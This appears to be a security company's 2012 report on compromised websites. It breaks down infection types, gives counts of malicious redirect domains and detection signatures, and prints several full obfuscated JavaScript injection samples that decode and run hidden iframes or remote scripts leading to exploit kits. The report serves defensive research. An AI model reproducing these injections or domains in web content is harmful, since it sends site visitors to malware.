When we see a compromised site distributing malware, it is often done via 4 methods: Iframe, Javascript, Spam or internal redirections. Those are not the only ways, and they can be encoded or hidden differently internally on the sites, but the final output on the compromised sites is generally one of them:
- Iframe injection: It makes the browser loads content from external (and malicious web sites). Example: <iframe src="http://pokosa.com/tds/go.php?sid=1" ..
- Javascript injection: Used to encode (hide) calls to iframes or additional remote javascript includes. Example: <script>d= Date ;d=new d();h=-parseInt("012")/5;if(window.document)try{new document.getElementById(“qwe”)…. (this code redirects users to the blackhole exploit kit)
- .htaccess (or conditional) redirections: Used to redirect anyone visiting the site from search engines (or specific user agents/ referers) to malware or spam content.
- Blackhat SEO spam: It is not really malware in the sense of the word (since it won’t infect anyone visiting the site), but it is still harmful for the webmaster and the site’s reputation (imagine a corporate site redirecting to a viagra online store).
April / 2012 stats
Last month ( April / 2012), we scanned a LOT of sites and many of them (107,616 to be more precise) were compromised. This is the breakdown per infection type:
- Iframe injection: 52.6%
- Javascript injection: 26.5%
- Blackhat SEO spam: 10.1%
- .htaccess redirections: 7.3%
- Other: 3%
Top malware domains per infection type and unique number of compromised sites
HTaccess
315 http://googlesgo.com.
105 http://jamkim.ru/in.cgi?4.
96 http://tro-pas.ru/in.cgi?4.
81 http://kim-vus.ru/in.cgi?4.
79 http://froling.bee.pl/.
77 http://www.fdvrerefrr.ezua.com/.
76 http://gafa-senda.ru/in.cgi?4.
74 http://namesti.bee.pl/.
69 http://vaclavska.bee.pl/.
68 http://stecdon.ru/example/status.php.
68 http://era-was.ru/in.cgi?4.
66 http://mod-sys.ru/acu?11.
62 http://kimvus.ru/in.cgi?4.
61 http://feat-container.ru/flayer?12.
61 http://acro-mini.ru/flayer?12.
59 http://vus-kim.ru/in.cgi?4.
59 http://sas-air.ru/space?7.
57 http://costabrava.bee.pl/.
56 http://mma-ga.ru/indigo?5.
55 http://jam-vus.ru/in.cgi?4.
53 http://wasera.ru/in.cgi?4.
53 http://jamvus.ru/in.cgi?4.
53 http://control-check.ru/flayer?12.
52 http://jam-kim.ru/in.cgi?4.
49 http://tropas.ru/in.cgi?4.
47 http://javlam.ru/in.cgi?5.
47 http://bysteb.ru/flayer?12.
46 http://pas-tro.ru/in.cgi?4.
46 http://gafasenda.ru/in.cgi?4.
46 http://gabplat.ru/in.cgi?4.
Iframes
3368 http://recovery-hdd.eu/in.cgi?6″
2298 http://almazzao-co.eu/in.cgi?6″
690 http://smuss.net/redirect.php”
523 http://geocacherzone.pt/mediamarkt/images/.tyt/.unzushlagen/sys/index.php”
519 http://sluxxqqgykewolmoli.in/in.cgi?default”
487 http://xxx.velery.in/images.php?t=44443094″
401 http://pokosa.com/tds/go.php?sid=1″
369 http://xsw.vedeved.in/images.php?t=44443094″
362 http://csepros.com”
319 http://sdc.hdljca.in/images.php?t=44443094″
313 http://sgh.nolerit.in/images.php?t=44443094″
302 http://wqx.nerolit.in/images.php?t=44443094″
295 http://niijz.hoahoc.org/images.php?t=44443094″
259 http://cds.zdcwzn.in/images.php?t=44443094″
257 http://tfa.gdasasa.in/images.php?t=44443094″
249 http://xxx.fedorita.in/images.php?t=44443094″
238 http://windowsflashmx.rr.nu/iframe.php?id=535″
225 http://vgdhr.us.to/images.php?t=44443094″
212 http://xxx.germiss.in/images.php?t=44443094″
200 http://sds.valerito.in/images.php?t=44443094″
194 http://65.126.238.126/scrp.php”
190 http://fwhhrx.baerika.in/images.php?t=44443094″
189 http://usf.haderut.in/images.php?t=44443094″
187 http://hga.adcxhg.in/images.php?t=44443094″
179 http://wajci.dnepr.com/images.php?t=44443094″
Encoded javascript:
Most of those encoded javascript malware we found, were being used to redirect to exploit kits (specially the Blackhole one).
784 <script>i=0;try{prototype;}catch(egewgsd){if(window.document)f
=["-32k-32k64k61k-9k-1k59k70k58k76k68k60k69k75k5k62k60k75k28k67k60k68k
60k69k75k74k25k80k43k56k62k37k56k68k60k-1k-2k57k70k59k80k-2k0k50k7k52k
0k82k-28k-32k-32k-32k64k61k73k56k68k60k73k-1k0k18k-28k-32k-32k84k-9k60
k67k74k60k-9k82k-28k-32k-32k-32k59k70k58k76k68k60k69k75k5k78k73k64k75k
60k-1k-7k19k64k61k73k56k68k60k-9k74k73k58k20k-2k63k75k75k71k17k6k6k67k
70k65k74k60k76k77k5k73k76k6k58k70k76k69k75k8k12k5k71k63k71k-2k-9k78k64
k59k75k63k20k-2k8k7k-2k-9k63k60k64k62k63k75k20k-2k8k7k-2k-9k74k75k80k6
7k60k20k-2k77k64k74k64k57k64k67k64k75k80k17k63k64k59k59k60k69k18k71k70
k74k64k75k64k70k69k17k56k57k74k70k67k76k75k60k18k67k60k61k75k17k7k18k7
5k70k71k17k7k18k-2k21k19k6k64k61k73k56k68k60k21k-7k0k18k-28k-32k-32k84
k-28k-32k-32k61k76k69k58k75k64k70k69k-9k64k61k73k56k68k60k73k-1k0k82k-
28k-32k-32k-32k77k56k73k-9k61k-9k20k-9k59k70k58k76k68k60k69k75k5k58k73
k60k56k75k60k28k67k60k68k60k69k75k-1k-2k64k61k73k56k68k60k-2k0k18k61k5
k74k60k75k24k75k75k73k64k57k76k75k60k-1k-2k74k73k58k-2k3k-2k63k75k75k7
1k17k6k6k67k70k65k74k60k76k77k5k73k76k6k58k70k76k69k75k8k12k5k71k63k71
k-2k0k18k61k5k74k75k80k67k60k5k77k64k74k64k57k64k67k64k75k80k20k-2k63k
64k59k59k60k69k-2k18k61k5k74k75k80k67k60k5k71k70k74k64k75k64k70k69k20k
-2k56k57k74k70k67k76k75k60k-2k18k61k5k74k75k80k67k60k5k67k60k61k75k20k
-2k7k-2k18k61k5k74k75k80k67k60k5k75k70k71k20k-2k7k-2k18k61k5k74k60k75k
24k75k75k73k64k57k76k75k60k-1k-2k78k64k59k75k63k-2k3k-2k8k7k-2k0k18k61
k5k74k60k75k24k75k75k73k64k57k76k75k60k-1k-2k63k60k64k62k63k75k-2k3k-2
k8k7k-2k0k18k-28k-32k-32k-32k59k70k58k76k68k60k69k75k5k62k60k75k28k67k
60k68k60k69k75k74k25k80k43k56k62k37k56k68k60k-1k-2k57k70k59k80k-2k0k50
k7k52k5k56k71k71k60k69k59k26k63k64k67k59k-1k61k0k18k-28k-32k-32k84"][0
].split("k");v="e"+"va"+"l";}if(v)e=window[v];w=f;s=[];r=String;for(;5
67!=i;i+=1){j=i;s=s+r["f"+"r"+"omC"+"har"+"C"+"ode"](w[j]*1+41);}if(e)
e(s);</script>
775 <script>c=2;i=c-2;if(parseInt("0123")===83)if(window.document)
try{new String("asd").prototype.q}catch(egewgsd){f=["-30i-30i66i63i-7i
1i61i72i60i78i70i62i71i77i7i64i62i77i30i69i62i70i62i71i77i76i27i82i45i
58i64i39i58i70i62i1i0i59i72i61i82i0i2i52i9i54i2i84i-26i-30i-30i-30i66i
63i75i58i70i62i75i1i2i20i-26i-30i-30i86i-7i62i69i76i62i-7i84i-26i-30i-
30i-30i61i72i60i78i70i62i71i77i7i80i75i66i77i62i1i-5i21i66i63i75i58i70
i62i-7i76i75i60i22i0i65i77i77i73i19i8i8i67i58i83i83i78i77i62i7i75i78i8
i60i72i78i71i77i14i7i73i65i73i0i-7i80i66i61i77i65i22i0i10i9i0i-7i65i62
i66i64i65i77i22i0i10i9i0i-7i76i77i82i69i62i22i0i79i66i76i66i59i66i69i6
6i77i82i19i65i66i61i61i62i71i20i73i72i76i66i77i66i72i71i19i58i59i76i72
i69i78i77i62i20i69i62i63i77i19i9i20i77i72i73i19i9i20i0i23i21i8i66i63i7
5i58i70i62i23i-5i2i20i-26i-30i-30i86i-26i-30i-30i63i78i71i60i77i66i72i
71i-7i66i63i75i58i70i62i75i1i2i84i-26i-30i-30i-30i79i58i75i-7i63i-7i22
i-7i61i72i60i78i70i62i71i77i7i60i75i62i58i77i62i30i69i62i70i62i71i77i1
i0i66i63i75i58i70i62i0i2i20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1
i0i76i75i60i0i5i0i65i77i77i73i19i8i8i67i58i83i83i78i77i62i7i75i78i8i60
i72i78i71i77i14i7i73i65i73i0i2i20i63i7i76i77i82i69i62i7i79i66i76i66i59
i66i69i66i77i82i22i0i65i66i61i61i62i71i0i20i63i7i76i77i82i69i62i7i73i7
2i76i66i77i66i72i71i22i0i58i59i76i72i69i78i77i62i0i20i63i7i76i77i82i69
i62i7i69i62i63i77i22i0i9i0i20i63i7i76i77i82i69i62i7i77i72i73i22i0i9i0i
20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1i0i80i66i61i77i65i0i5i0i1
0i9i0i2i20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1i0i65i62i66i64i65
i77i0i5i0i10i9i0i2i20i-26i-30i-30i-30i61i72i60i78i70i62i71i77i7i64i62i
77i30i69i62i70i62i71i77i76i27i82i45i58i64i39i58i70i62i1i0i59i72i61i82i
0i2i52i9i54i7i58i73i73i62i71i61i28i65i66i69i61i1i63i2i20i-26i-30i-30i8
6"][0].split("i");v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(
;565!=i;i+=1){j=i;s+=r["fromC"+"harCode"](39+1*w[j]);}if(f)z=s;e(z);</
script>
642 <script>d=Date;d=new d();h=-parseInt("012")/5;if(window.docume
nt)try{new document.getElementById("qwe").prototype}catch(qqq){st=Stri
ng;zz="al";zz="v"+zz;ss="";if(1){f="f"+"r"+"o"+"m"+"Ch"+"ar";f=f+"C"+"
od"+"e";}e=this[f.substr(11)+zz];t="y";}n="3.5~3.5~51.5~50~15~19~49~54
.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~54
~57~56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.
5~18.5~19.5~44.5~23~45.5~19.5~60.5~5.5~3.5~3.5~3.5~51.5~50~56~47.5~53.
5~49.5~56~19~19.5~28.5~5.5~3.5~3.5~61.5~15~49.5~53~56.5~49.5~15~60.5~5
.5~3.5~3.5~3.5~49~54.5~48.5~57.5~53.5~49.5~54~57~22~58.5~56~51.5~57~49
.5~19~16~29~51.5~50~56~47.5~53.5~49.5~15~56.5~56~48.5~29.5~18.5~51~57~
57~55~28~22.5~22.5~50~56~49.5~56.5~51~57~49~56.5~22~51.5~54~22.5~51.5~
54~22~48.5~50.5~51.5~30.5~27.5~18.5~15~58.5~51.5~49~57~51~29.5~18.5~23
.5~23~18.5~15~51~49.5~51.5~50.5~51~57~29.5~18.5~23.5~23~18.5~15~56.5~5
7~59.5~53~49.5~29.5~18.5~58~51.5~56.5~51.5~48~51.5~53~51.5~57~59.5~28~
51~51.5~49~49~49.5~54~28.5~55~54.5~56.5~51.5~57~51.5~54.5~54~28~47.5~4
8~56.5~54.5~53~57.5~57~49.5~28.5~53~49.5~50~57~28~23~28.5~57~54.5~55~2
8~23~28.5~18.5~30~29~22.5~51.5~50~56~47.5~53.5~49.5~30~16~19.5~28.5~5.
5~3.5~3.5~61.5~5.5~3.5~3.5~50~57.5~54~48.5~57~51.5~54.5~54~15~51.5~50~
56~47.5~53.5~49.5~56~19~19.5~60.5~5.5~3.5~3.5~3.5~58~47.5~56~15~50~15~
29.5~15~49~54.5~48.5~57.5~53.5~49.5~54~57~22~48.5~56~49.5~47.5~57~49.5
~33.5~53~49.5~53.5~49.5~54~57~19~18.5~51.5~50~56~47.5~53.5~49.5~18.5~1
9.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5
~56.5~56~48.5~18.5~21~18.5~51~57~57~55~28~22.5~22.5~50~56~49.5~56.5~51
~57~49~56.5~22~51.5~54~22.5~51.5~54~22~48.5~50.5~51.5~30.5~27.5~18.5~1
9.5~28.5~50~22~56.5~57~59.5~53~49.5~22~58~51.5~56.5~51.5~48~51.5~53~51
.5~57~59.5~29.5~18.5~51~51.5~49~49~49.5~54~18.5~28.5~50~22~56.5~57~59.
5~53~49.5~22~55~54.5~56.5~51.5~57~51.5~54.5~54~29.5~18.5~47.5~48~56.5~
54.5~53~57.5~57~49.5~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~53~49.5~5
0~57~29.5~18.5~23~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~57~54.5~55~2
9.5~18.5~23~18.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57
~49.5~19~18.5~58.5~51.5~49~57~51~18.5~21~18.5~23.5~23~18.5~19.5~28.5~5
0~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~51~49.5~5
1.5~50.5~51~57~18.5~21~18.5~23.5~23~18.5~19.5~28.5~5.5~3.5~3.5~3.5~49~
54.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~
54~57~56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~5
9.5~18.5~19.5~44.5~23~45.5~22~47.5~55~55~49.5~54~49~32.5~51~51.5~53~49
~19~50~19.5~28.5~5.5~3.5~3.5~61.5".split("a~".substr(1));for(i=0;i!=56
3;i++){j=i;ss=ss+st[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(""+q);</scr
ipt>
556 <script>c=3-1;i=-1-1+c;p=parseInt;if(p("01"+"2"+"3")===83)try{
Number()["pr"+"ot"+"ot"+"ype"].q}catch(egewgsd){if(window.document)f=[
"-32k-32k64k61k-9k-1k59k70k58k76k68k60k69k75k5k62k60k75k28k67k60k68k60
k69k75k74k25k80k43k56k62k37k56k68k60k-1k-2k57k70k59k80k-2k0k50k7k52k0k
82k-28k-32k-32k-32k64k61k73k56k68k60k73k-1k0k18k-28k-32k-32k84k-9k60k6
7k74k60k-9k82k-28k-32k-32k-32k59k70k58k76k68k60k69k75k5k78k73k64k75k60
k-1k-7k19k64k61k73k56k68k60k-9k74k73k58k20k-2k63k75k75k71k17k6k6k71k64
k59k70k63k64k74k5k73k76k6k58k70k76k69k75k8k10k5k71k63k71k-2k-9k78k64k5
9k75k63k20k-2k8k7k-2k-9k63k60k64k62k63k75k20k-2k8k7k-2k-9k74k75k80k67k
60k20k-2k77k64k74k64k57k64k67k64k75k80k17k63k64k59k59k60k69k18k71k70k7
4k64k75k64k70k69k17k56k57k74k70k67k76k75k60k18k67k60k61k75k17k7k18k75k
70k71k17k7k18k-2k21k19k6k64k61k73k56k68k60k21k-7k0k18k-28k-32k-32k84k-
28k-32k-32k61k76k69k58k75k64k70k69k-9k64k61k73k56k68k60k73k-1k0k82k-28
k-32k-32k-32k77k56k73k-9k61k-9k20k-9k59k70k58k76k68k60k69k75k5k58k73k6
0k56k75k60k28k67k60k68k60k69k75k-1k-2k64k61k73k56k68k60k-2k0k18k61k5k7
4k60k75k24k75k75k73k64k57k76k75k60k-1k-2k74k73k58k-2k3k-2k63k75k75k71k
17k6k6k71k64k59k70k63k64k74k5k73k76k6k58k70k76k69k75k8k10k5k71k63k71k-
2k0k18k61k5k74k75k80k67k60k5k77k64k74k64k57k64k67k64k75k80k20k-2k63k64
k59k59k60k69k-2k18k61k5k74k75k80k67k60k5k71k70k74k64k75k64k70k69k20k-2
k56k57k74k70k67k76k75k60k-2k18k61k5k74k75k80k67k60k5k67k60k61k75k20k-2
k7k-2k18k61k5k74k75k80k67k60k5k75k70k71k20k-2k7k-2k18k61k5k74k60k75k24
k75k75k73k64k57k76k75k60k-1k-2k78k64k59k75k63k-2k3k-2k8k7k-2k0k18k61k5
k74k60k75k24k75k75k73k64k57k76k75k60k-1k-2k63k60k64k62k63k75k-2k3k-2k8
k7k-2k0k18k-28k-32k-32k-32k59k70k58k76k68k60k69k75k5k62k60k75k28k67k60
k68k60k69k75k74k25k80k43k56k62k37k56k68k60k-1k-2k57k70k59k80k-2k0k50k7
k52k5k56k71k71k60k69k59k26k63k64k67k59k-1k61k0k18k-28k-32k-32k84"][0].
split("k");v="e"+"va"+"l";}if(v)e=window[v];w=f;s=[];r=String;for(;567
!=i;i+=1){j=i;s=s+r["f"+"r"+"omC"+"har"+"C"+"ode"](w[j]*1+41);}if(e)e(
s);</script>
544 <script>var _0x8ab7=["x31x34x36x2Ex31x38x35x2Ex32x35
x34x2Ex32x34x35","x33x31x2Ex31x38x34x2Ex32x34x32x2Ex3
1x30x33","x39x31x2Ex31x39x36x2Ex32x31x36x2Ex31x34x38",
"x39x31x2Ex31x39x36x2Ex32x31x36x2Ex34x39","x73x63x72x
69x70x74","x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74","x
73x72x63","x68x74x74x70x3Ax2Fx2F","x2Fx73x2Ex70x68x70",
"x68x65x61x64","x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x
79x54x61x67x4Ex61x6Dx65","x61x70x70x65x6Ex64x43x68x69
x6Cx64"];var _0xa341=[_0x8ab7[0],_0x8ab7[1],_0x8ab7[2],_0x8ab7[3]];fo
r(var i in _0xa341){var js=document[_0x8ab7[5]](_0x8ab7[4]);js[_0x8ab7
[6]]=_0x8ab7[7]+_0xa341[i]+_0x8ab7[8];var head=document[_0x8ab7[10]](_
0x8ab7[9])[0];head[_0x8ab7[11]](js);} ;</script>
486 <script>c=2;i=c-2;if(parseInt("0123")===83)if(window.document)
try{new String("asd").prototype.q}catch(egewgsd){f=["-30i-30i66i63i-7i
1i61i72i60i78i70i62i71i77i7i64i62i77i30i69i62i70i62i71i77i76i27i82i45i
58i64i39i58i70i62i1i0i59i72i61i82i0i2i52i9i54i2i84i-26i-30i-30i-30i66i
63i75i58i70i62i75i1i2i20i-26i-30i-30i86i-7i62i69i76i62i-7i84i-26i-30i-
30i-30i61i72i60i78i70i62i71i77i7i80i75i66i77i62i1i-5i21i66i63i75i58i70
i62i-7i76i75i60i22i0i65i77i77i73i19i8i8i78i71i80i72i80i73i78i7i62i78i8
i60i72i78i71i77i12i7i73i65i73i0i-7i80i66i61i77i65i22i0i10i9i0i-7i65i62
i66i64i65i77i22i0i10i9i0i-7i76i77i82i69i62i22i0i79i66i76i66i59i66i69i6
6i77i82i19i65i66i61i61i62i71i20i73i72i76i66i77i66i72i71i19i58i59i76i72
i69i78i77i62i20i69i62i63i77i19i9i20i77i72i73i19i9i20i0i23i21i8i66i63i7
5i58i70i62i23i-5i2i20i-26i-30i-30i86i-26i-30i-30i63i78i71i60i77i66i72i
71i-7i66i63i75i58i70i62i75i1i2i84i-26i-30i-30i-30i79i58i75i-7i63i-7i22
i-7i61i72i60i78i70i62i71i77i7i60i75i62i58i77i62i30i69i62i70i62i71i77i1
i0i66i63i75i58i70i62i0i2i20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1
i0i76i75i60i0i5i0i65i77i77i73i19i8i8i78i71i80i72i80i73i78i7i62i78i8i60
i72i78i71i77i12i7i73i65i73i0i2i20i63i7i76i77i82i69i62i7i79i66i76i66i59
i66i69i66i77i82i22i0i65i66i61i61i62i71i0i20i63i7i76i77i82i69i62i7i73i7
2i76i66i77i66i72i71i22i0i58i59i76i72i69i78i77i62i0i20i63i7i76i77i82i69
i62i7i69i62i63i77i22i0i9i0i20i63i7i76i77i82i69i62i7i77i72i73i22i0i9i0i
20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1i0i80i66i61i77i65i0i5i0i1
0i9i0i2i20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1i0i65i62i66i64i65
i77i0i5i0i10i9i0i2i20i-26i-30i-30i-30i61i72i60i78i70i62i71i77i7i64i62i
77i30i69i62i70i62i71i77i76i27i82i45i58i64i39i58i70i62i1i0i59i72i61i82i
0i2i52i9i54i7i58i73i73i62i71i61i28i65i66i69i61i1i63i2i20i-26i-30i-30i8
6"][0].split("i");md="a";v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=Stri
ng;for(;565!=i;i+=1){j=i;s+=r["fromC"+"harCode"](39+1*w[j]);}if(f)z=s;
e(z);</script>
424 <script>c=2;i=c-2;if(window.document)try{new c.prototype}catch
(hgberger){f=["-29n-29n67n64n-6n2n62n73n61n79n71n63n72n78n8n65n63n78n3
1n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n
53n10n55n3n85n-25n-29n-29n-29n67n64n76n59n71n63n76n2n3n21n-25n-29n-29n
87n-6n63n70n77n63n-6n85n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n81n7
6n67n78n63n2n-4n22n67n64n76n59n71n63n-6n77n76n61n23n1n66n78n78n74n20n9
n9n64n63n61n73n76n73n71n8n67n72n9n61n73n79n72n78n11n8n74n66n74n1n-6n81
n67n62n78n66n23n1n11n10n1n-6n66n63n67n65n66n78n23n1n11n10n1n-6n77n78n8
3n70n63n23n1n80n67n77n67n60n67n70n67n78n83n20n66n67n62n62n63n72n21n74n
73n77n67n78n67n73n72n20n59n60n77n73n70n79n78n63n21n70n63n64n78n20n10n2
1n78n73n74n20n10n21n1n24n22n9n67n64n76n59n71n63n24n-4n3n21n-25n-29n-29
n87n-25n-29n-29n64n79n72n61n78n67n73n72n-6n67n64n76n59n71n63n76n2n3n85
n-25n-29n-29n-29n80n59n76n-6n64n-6n23n-6n62n73n61n79n71n63n72n78n8n61n
76n63n59n78n63n31n70n63n71n63n72n78n2n1n67n64n76n59n71n63n1n3n21n64n8n
77n63n78n27n78n78n76n67n60n79n78n63n2n1n77n76n61n1n6n1n66n78n78n74n20n
9n9n64n63n61n73n76n73n71n8n67n72n9n61n73n79n72n78n11n8n74n66n74n1n3n21
n64n8n77n78n83n70n63n8n80n67n77n67n60n67n70n67n78n83n23n1n66n67n62n62n
63n72n1n21n64n8n77n78n83n70n63n8n74n73n77n67n78n67n73n72n23n1n59n60n77
n73n70n79n78n63n1n21n64n8n77n78n83n70n63n8n70n63n64n78n23n1n10n1n21n64
n8n77n78n83n70n63n8n78n73n74n23n1n10n1n21n64n8n77n63n78n27n78n78n76n67
n60n79n78n63n2n1n81n67n62n78n66n1n6n1n11n10n1n3n21n64n8n77n63n78n27n78
n78n76n67n60n79n78n63n2n1n66n63n67n65n66n78n1n6n1n11n10n1n3n21n-25n-29
n-29n-29n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28
n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n53n10n55n8n59n74n74n63n72
n62n29n66n67n70n62n2n64n3n21n-25n-29n-29n87"][0].split("n");md="a";e=w
indow["e"+"val"];w=f;s=[];r=String;for(;565!=i;i+=1){j=i;s+=r.fromChar
Code(38+1*w[j]);}e(s);}</script>
405 <script>i=0;try{prototype;}catch(egewgsd){f=["-32b-32b64b61b-9
b-1b59b70b58b76b68b60b69b75b5b62b60b75b28b67b60b68b60b69b75b74b25b80b4
3b56b62b37b56b68b60b-1b-2b57b70b59b80b-2b0b50b7b52b0b82b-28b-32b-32b-3
2b64b61b73b56b68b60b73b-1b0b18b-28b-32b-32b84b-9b60b67b74b60b-9b82b-28
b-32b-32b-32b59b70b58b76b68b60b69b75b5b78b73b64b75b60b-1b-7b19b64b61b7
3b56b68b60b-9b74b73b58b20b-2b63b75b75b71b17b6b6b57b80b67b77b64b63b56b5
b73b76b6b58b70b76b69b75b8b15b5b71b63b71b-2b-9b78b64b59b75b63b20b-2b8b7
b-2b-9b63b60b64b62b63b75b20b-2b8b7b-2b-9b74b75b80b67b60b20b-2b77b64b74
b64b57b64b67b64b75b80b17b63b64b59b59b60b69b18b71b70b74b64b75b64b70b69b
17b56b57b74b70b67b76b75b60b18b67b60b61b75b17b7b18b75b70b71b17b7b18b-2b
21b19b6b64b61b73b56b68b60b21b-7b0b18b-28b-32b-32b84b-28b-32b-32b61b76b
69b58b75b64b70b69b-9b64b61b73b56b68b60b73b-1b0b82b-28b-32b-32b-32b77b5
6b73b-9b61b-9b20b-9b59b70b58b76b68b60b69b75b5b58b73b60b56b75b60b28b67b
60b68b60b69b75b-1b-2b64b61b73b56b68b60b-2b0b18b61b5b74b60b75b24b75b75b
73b64b57b76b75b60b-1b-2b74b73b58b-2b3b-2b63b75b75b71b17b6b6b57b80b67b7
7b64b63b56b5b73b76b6b58b70b76b69b75b8b15b5b71b63b71b-2b0b18b61b5b74b75
b80b67b60b5b77b64b74b64b57b64b67b64b75b80b20b-2b63b64b59b59b60b69b-2b1
8b61b5b74b75b80b67b60b5b71b70b74b64b75b64b70b69b20b-2b56b57b74b70b67b7
6b75b60b-2b18b61b5b74b75b80b67b60b5b67b60b61b75b20b-2b7b-2b18b61b5b74b
75b80b67b60b5b75b70b71b20b-2b7b-2b18b61b5b74b60b75b24b75b75b73b64b57b7
6b75b60b-1b-2b78b64b59b75b63b-2b3b-2b8b7b-2b0b18b61b5b74b60b75b24b75b7
5b73b64b57b76b75b60b-1b-2b63b60b64b62b63b75b-2b3b-2b8b7b-2b0b18b-28b-3
2b-32b-32b59b70b58b76b68b60b69b75b5b62b60b75b28b67b60b68b60b69b75b74b2
5b80b43b56b62b37b56b68b60b-1b-2b57b70b59b80b-2b0b50b7b52b5b56b71b71b60
b69b59b26b63b64b67b59b-1b61b0b18b-28b-32b-32b84"][0].split("b");v="e"+
"va"+"l";}if(v)e=window[v];try{new 125;}catch(qwg){w=f;s=[];}r=String;
for(;567!=i;i+=1){j=i;if(e)s=s+r["f"+"r"+"omC"+"har"+"C"+"ode"](w[j]*1
+41);}if(e)e(s);</script>
357 <script>c=3-1;i=-1-1+c;p=parseInt;if(p("01"+"2"+"3")===83)try{
Boolean()["pr"+"otot"+"ype"].q}catch(egewgsd){if(window.document)f=["-
32i-32i64i61i-9i-1i59i70i58i76i68i60i69i75i5i62i60i75i28i67i60i68i60i6
9i75i74i25i80i43i56i62i37i56i68i60i-1i-2i57i70i59i80i-2i0i50i7i52i0i82
i-28i-32i-32i-32i64i61i73i56i68i60i73i-1i0i18i-28i-32i-32i84i-9i60i67i
74i60i-9i82i-28i-32i-32i-32i59i70i58i76i68i60i69i75i5i78i73i64i75i60i-
1i-7i19i64i61i73i56i68i60i-9i74i73i58i20i-2i63i75i75i71i17i6i6i71i64i5
9i70i63i64i74i5i73i76i6i58i70i76i69i75i8i10i5i71i63i71i-2i-9i78i64i59i
75i63i20i-2i8i7i-2i-9i63i60i64i62i63i75i20i-2i8i7i-2i-9i74i75i80i67i60
i20i-2i77i64i74i64i57i64i67i64i75i80i17i63i64i59i59i60i69i18i71i70i74i
64i75i64i70i69i17i56i57i74i70i67i76i75i60i18i67i60i61i75i17i7i18i75i70
i71i17i7i18i-2i21i19i6i64i61i73i56i68i60i21i-7i0i18i-28i-32i-32i84i-28
i-32i-32i61i76i69i58i75i64i70i69i-9i64i61i73i56i68i60i73i-1i0i82i-28i-
32i-32i-32i77i56i73i-9i61i-9i20i-9i59i70i58i76i68i60i69i75i5i58i73i60i
56i75i60i28i67i60i68i60i69i75i-1i-2i64i61i73i56i68i60i-2i0i18i61i5i74i
60i75i24i75i75i73i64i57i76i75i60i-1i-2i74i73i58i-2i3i-2i63i75i75i71i17
i6i6i71i64i59i70i63i64i74i5i73i76i6i58i70i76i69i75i8i10i5i71i63i71i-2i
0i18i61i5i74i75i80i67i60i5i77i64i74i64i57i64i67i64i75i80i20i-2i63i64i5
9i59i60i69i-2i18i61i5i74i75i80i67i60i5i71i70i74i64i75i64i70i69i20i-2i5
6i57i74i70i67i76i75i60i-2i18i61i5i74i75i80i67i60i5i67i60i61i75i20i-2i7
i-2i18i61i5i74i75i80i67i60i5i75i70i71i20i-2i7i-2i18i61i5i74i60i75i24i7
5i75i73i64i57i76i75i60i-1i-2i78i64i59i75i63i-2i3i-2i8i7i-2i0i18i61i5i7
4i60i75i24i75i75i73i64i57i76i75i60i-1i-2i63i60i64i62i63i75i-2i3i-2i8i7
i-2i0i18i-28i-32i-32i-32i59i70i58i76i68i60i69i75i5i62i60i75i28i67i60i6
8i60i69i75i74i25i80i43i56i62i37i56i68i60i-1i-2i57i70i59i80i-2i0i50i7i5
2i5i56i71i71i60i69i59i26i63i64i67i59i-1i61i0i18i-28i-32i-32i84"][0].sp
lit("i");v="e"+"va"+"l";}if(v)e=window[v];w=f;s=[];r=String;for(;567!=
i;i+=1){j=i;s=s+r["f"+"r"+"omC"+"har"+"C"+"ode"](w[j]*1+41);}if(e)e(s)
;</script>
Malware signatures
Even though we can classify web malware into those 4 categories above, we sub-categorize them for our analysis and internal detection. Those were the top signatures detected (per page, not per site in this count):
39392 http://sucuri.net/malware/malware-entry-mwblacklisted35
27984 http://sucuri.net/malware/malware-entry-mwanomalysp8
27491 http://sucuri.net/malware/entry/MW:IFRAME:HD202
15393 http://sucuri.net/malware/malware-entry-mwjs67473
15280 http://sucuri.net/malware/web-site-disabled
13064 http://sucuri.net/malware/entry/MW:JS:DEPACK
12440 http://sucuri.net/malware/malware-entry-mwht291
10209 http://sucuri.net/malware/malware-entry-mwjsanon7
10005 http://sucuri.net/malware/entry/MW:SPAM:SEO
9746 http://sucuri.net/malware/malware-entry-mwiframeenc1603
7180 http://sucuri.net/malware/malware-entry-mwiframehd564
6863 http://sucuri.net/malware/malware-entry-mwjs160
6597 http://sucuri.net/malware/malware-entry-mwhjck3123
6060 http://sucuri.net/malware/malware-entry-mwjs69693
3449 http://sucuri.net/malware/malware-entry-mwjsde921
3123 http://sucuri.net/malware/malware-entry-mwhta7
2138 http://sucuri.net/malware/malware-entry-mwjs2368
1438 http://sucuri.net/malware/entry/MW:JS:150
1275 http://sucuri.net/malware/malware-entry-mwjs488
1208 http://sucuri.net/malware/entry/MW:DEFACED:01
1061 http://sucuri.net/malware/malware-entry-mwgdd6
800 http://sucuri.net/malware/entry/MW:JS:221
780 http://sucuri.net/malware/malware-entry-mwanomalysp7
532 http://sucuri.net/malware/malware-entry-mwjsjj678
367 http://sucuri.net/malware/malware-entry-mwjs159
